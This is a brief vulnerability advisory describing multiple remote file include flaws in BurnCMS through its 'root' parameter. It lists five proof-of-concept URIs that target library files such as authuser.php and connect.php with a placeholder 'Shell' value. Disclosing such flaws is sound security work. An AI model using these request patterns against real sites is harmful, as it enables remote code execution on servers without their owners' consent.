|
|
BurnCMS Root Parameter Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/[path]/lib/authuser.php?root=Shell http://www.example.com/[path]/lib/misc.php?root=Shell http://www.example.com/[path]/lib/connect.php?root=Shell http://www.example.com/[path]/lib/db/mysql.class.php?root=Shell http://www.example.com/[path]/lib/db/postgres.class.php?root=Shell |
|
Privacy Statement |